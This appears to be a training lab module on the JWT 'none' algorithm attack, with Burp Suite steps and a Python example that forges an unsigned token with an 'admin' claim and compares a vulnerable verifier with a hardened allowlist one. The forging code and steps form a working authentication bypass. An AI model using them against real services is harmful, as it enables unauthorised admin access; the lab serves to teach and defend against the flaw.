JWT Attacks

Do Not Check This Token Thanks - JWT's Notorious 'None' Algorithm

Easy
30 min

"None" Algorithm

One of the "signature algorithms" a JWT can declare in its JOSE header is "None", meaning no signature at all. If an application accepts such tokens, even if the developer has never considered the possibility, the consequences are catastrophic: anyone can write whatever claims they like into a token and the application will trust them. A JWT with "None" as the signature algorithm looks like an ordinary token, except that the header's "alg" value is "None" and the signature part after the second dot is empty.

Step 1 - Obtain Token

Obtain the JWT token that the application gives you. You can see this in Burp's HTTP history when you invoke functions of the application that include the token.

Step 2 - Send HTTP request to Repeater

Send an HTTP request containing the token to Repeater so that you can resend it as many times as you like, modifying the token each time, and observe whether the application accepts the modified token. Acceptance of a modified token indicates a successful attack.

Step 3 - Edit token

Decode the token, change the algorithm (alg) value in its JOSE header to "None", and reassemble the token. You can do this in a couple of different ways; one option is Hakatemia's JWT Studio (Tools -> JWT Studio):

The second option is to use Burp Suite's "JSON Web Tokens" extension:

Step 4 - Victory

Once you have assembled a new JWT, replace the token originally present in the HTTP request with it and resend the request.

JWT Verification Bypass - 'None' Algorithm

In this lab, you will be able to perform your first JWT attack. The goal is to log in to the application as a regular user and obtain a token that has the "admin" claim value set to false. Then, using the techniques you have learned in this module, modify the token so that the "admin" claim value is true. Finally, read the flag from the /api/v1/flag endpoint.
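To make the server side of this concrete, here is an added example (not code from Hakatemia or from the lab application) that models both halves of the walkthrough above: a token editor that decodes a JWT, rewrites the header's alg to "none" and flips the "admin" claim, and two verifiers, one that trusts the token's own alg header and one that pins the algorithm to an allowlist. The secret, the claims and the function names are constructed for the demonstration and use only the Python standard library.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# Constructed demo secret; a real service loads its key from a secret store.
SECRET = b"demo-secret-not-for-production"

# The verifier decides which algorithms are acceptable. The token never does.
ALLOWED_ALGS = {"HS256"}


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _compact_json(obj: dict) -> str:
    return json.dumps(obj, separators=(",", ":"))


def decode_unverified(token: str) -> Tuple[dict, dict, str]:
    """Split a JWT into (header, claims, signature) without checking anything.
    This is what a JWT editor shows you; it must never gate authorisation."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("a JWS compact token has exactly three parts")
    header = json.loads(b64url_decode(parts[0]))
    claims = json.loads(b64url_decode(parts[1]))
    return header, claims, parts[2]


def sign_hs256(header: dict, claims: dict, secret: bytes) -> str:
    """Issue a properly signed token, as the lab application would at login."""
    signing_input = b64url_encode(_compact_json(header).encode()) + "." + \
        b64url_encode(_compact_json(claims).encode())
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def forge_none_token(token: str) -> str:
    """Step 3 of the walkthrough: same claims, alg set to none, empty signature,
    with the 'admin' claim flipped to true as the lab asks."""
    header, claims, _ = decode_unverified(token)
    header["alg"] = "none"
    claims["admin"] = True
    return b64url_encode(_compact_json(header).encode()) + "." + \
        b64url_encode(_compact_json(claims).encode()) + "."


def _hs256_signature_matches(token: str, signature: str, secret: bytes) -> bool:
    signing_input = token.rsplit(".", 1)[0]
    expected = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(signature))


def vulnerable_verify(token: str, secret: bytes) -> Optional[dict]:
    """Lets the token's own 'alg' header choose the check. Comparing the value
    case-insensitively mirrors why the lab's capitalised "None" also works."""
    header, claims, signature = decode_unverified(token)
    alg = str(header.get("alg", ""))
    if alg.lower() == "none":
        return claims  # accepted with no signature check at all
    if alg == "HS256" and _hs256_signature_matches(token, signature, secret):
        return claims
    return None


def hardened_verify(token: str, secret: bytes) -> Optional[dict]:
    """Rejects any algorithm outside the allowlist before touching the signature,
    so 'none' in any spelling, and an empty signature, never reach the claims."""
    header, claims, signature = decode_unverified(token)
    if header.get("alg") not in ALLOWED_ALGS:
        return None
    if not _hs256_signature_matches(token, signature, secret):
        return None
    return claims


if __name__ == "__main__":
    issued = sign_hs256({"alg": "HS256", "typ": "JWT"},
                        {"sub": "alice", "admin": False}, SECRET)
    forged = forge_none_token(issued)
    print("forged token:", forged)
    print("vulnerable verifier:", vulnerable_verify(forged, SECRET))
    print("hardened verifier:", hardened_verify(forged, SECRET))
```

The detection point for a defender is the same as the attack point for the lab: the hardened verifier logs and rejects any token whose header algorithm is not on its allowlist, and any such rejection in production traffic is worth alerting on, since legitimate clients never send one.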

Objective

Read the flag from the /api/v1/flag endpoint.

Exercises

Flag

Find the flag from the lab environment and enter it below.
